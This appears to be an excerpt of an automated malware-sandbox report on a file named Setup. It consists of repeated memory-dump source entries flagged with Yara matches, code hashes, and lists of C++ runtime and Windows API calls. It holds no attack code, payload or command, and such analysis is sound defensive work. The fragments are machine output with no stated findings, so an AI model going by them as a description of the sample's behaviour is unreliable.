                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 3fe37af3e313c02da52baeb62f5118d446ce2b792a4226e19bfca930f8075909
                                                                                                                                                                                                                                                      • Instruction ID: 930175e1ea320889c8ef3bc9a1bb04d407ce9c07a3f8502148b0ed3d1b20cc99
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fe37af3e313c02da52baeb62f5118d446ce2b792a4226e19bfca930f8075909
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D614972E1051A9FCB04CF58C880AAEB7B5FB48310F55826AE915E7784EB31AD51CBD4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 0aec070ff7df71079dea68aa5c4471150d6744103dc1b2f8df810bae891c6966
                                                                                                                                                                                                                                                      • Instruction ID: 83b132e18b6f001093d6c46f05a186fc5659d891155155aa4d13f40fac1a379c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0aec070ff7df71079dea68aa5c4471150d6744103dc1b2f8df810bae891c6966
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A517D72D00259AFDF04CF98C840AEEBBB6EF98304F1D849DE915AB201D7359A41CB90
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 452f7488cc4eed07f6e177e429ecc21ff5953957f89fe2dcdbfa193ed2300b74
                                                                                                                                                                                                                                                      • Instruction ID: 5ba47d65f214165c216fd610bf58fe179192583fcee8447613350ce0e63ed04d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 452f7488cc4eed07f6e177e429ecc21ff5953957f89fe2dcdbfa193ed2300b74
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F515E72D00119EFEF15CF94C840AEEFBB6EF88304F198499E515AB341D7789A40CB90
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 4c71cff6a94870fedccfcd55475c18c7052ef66247d7d813a07c0d6ad7669ce3
                                                                                                                                                                                                                                                      • Instruction ID: 2ce40ae687a410d5423991771c6407b9e89b22957d960aa14abb68f68adfd005
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c71cff6a94870fedccfcd55475c18c7052ef66247d7d813a07c0d6ad7669ce3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D416521219BC49FD339CE6C885519ABFB0DF66210B484B8DE4D797B83C614E609C7AA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 4c71cff6a94870fedccfcd55475c18c7052ef66247d7d813a07c0d6ad7669ce3
                                                                                                                                                                                                                                                      • Instruction ID: 07e8f854da2521b071bff78a49589327ad766b6e4efa2b2a5a5be3f9606c2c9c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c71cff6a94870fedccfcd55475c18c7052ef66247d7d813a07c0d6ad7669ce3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30414231219BC48FD739CE6C881119A7FE1DF66214B484B9DE4E697B83C214EA0DC7E6
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Memory Dump Source
• Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Memory Dump Source
• Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
APIs
• type_info::operator==.LIBVCRUNTIME ref: 031C1F37
• ___TypeMatch.LIBVCRUNTIME ref: 031C2045
• CatchIt.LIBVCRUNTIME ref: 031C2096
• CallUnexpected.LIBVCRUNTIME ref: 031C21B2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
Similarity
• API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2356445960-393685449
APIs
• type_info::operator==.LIBVCRUNTIME ref: 02D7371B
• ___TypeMatch.LIBVCRUNTIME ref: 02D73829
• CatchIt.LIBVCRUNTIME ref: 02D7387A
• CallUnexpected.LIBVCRUNTIME ref: 02D73996
Strings
Memory Dump Source
• Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D584A3
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D584C5
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D584ED
                                                                                                                                                                                                                                                      • __Getctype.LIBCPMT ref: 02D585C8
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D5862E
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D58662
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                                                      • String ID: @PI
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _strrchr
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _strrchr
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D3C091
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D3C0B3
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D3C0DB
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D3C1D5
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D3C209
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                      • String ID: @PI
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 031B3510
                                                                                                                                                                                                                                                      • _Maklocchr.LIBCPMT ref: 031B35A3
                                                                                                                                                                                                                                                      • _Maklocchr.LIBCPMT ref: 031B35B3
                                                                                                                                                                                                                                                      • _Getvals.LIBCPMT ref: 031B35D5
                                                                                                                                                                                                                                                        • Part of subcall function 031ACBA3: _Maklocchr.LIBCPMT ref: 031ACBD2
                                                                                                                                                                                                                                                        • Part of subcall function 031ACBA3: _Maklocchr.LIBCPMT ref: 031ACBE8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Maklocchr$GetvalsH_prolog3_
                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 031AB6A6
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 031AB711
                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 031AB72E
                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 031AB76D
                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 031AB7CC
                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 031AB7EF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2829165498-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031A6CBF
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031A6CE1
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031A6D09
                                                                                                                                                                                                                                                      • __Getctype.LIBCPMT ref: 031A6DE4
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031A6E4A
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031A6E7E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1102183713-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 03189580
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031895A2
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031895CA
                                                                                                                                                                                                                                                      • __Getctype.LIBCPMT ref: 031896A5
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031896E0
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 03189714
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1102183713-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D3AD64
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D3AD86
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D3ADAE
                                                                                                                                                                                                                                                      • __Getctype.LIBCPMT ref: 02D3AE89
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D3AEC4
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D3AEF8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1102183713-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,031C1AA1,031BFBEC,031A8094), ref: 031C1AB8
                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 031C1AC6
                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 031C1ADF
                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,031C1AA1,031BFBEC,031A8094), ref: 031C1B31
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFEF5
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFEFF
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 031AFF39
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFF50
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFF70
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFF7D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3064348918-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D616D9
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D616E3
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • numpunct.LIBCPMT ref: 02D6171D
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D61734
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D61754
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D61761
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3064348918-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF63A
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF644
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 031AF67E
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF695
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF6B5
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF6C2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 958335874-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF6CF
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF6D9
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 031AF713
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF72A
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF74A
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF757
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 958335874-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF5A5
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF5AF
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • ctype.LIBCPMT ref: 031AF5E9
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF600
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF620
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF62D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2958136301-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFB77
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFB81
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 031AFBBB
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFBD2
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFBF2
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFBFF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3376033448-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AFA4D
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AFA57
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • moneypunct.LIBCPMT ref: 031AFA91
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AFAA8
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AFAC8
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AFAD5
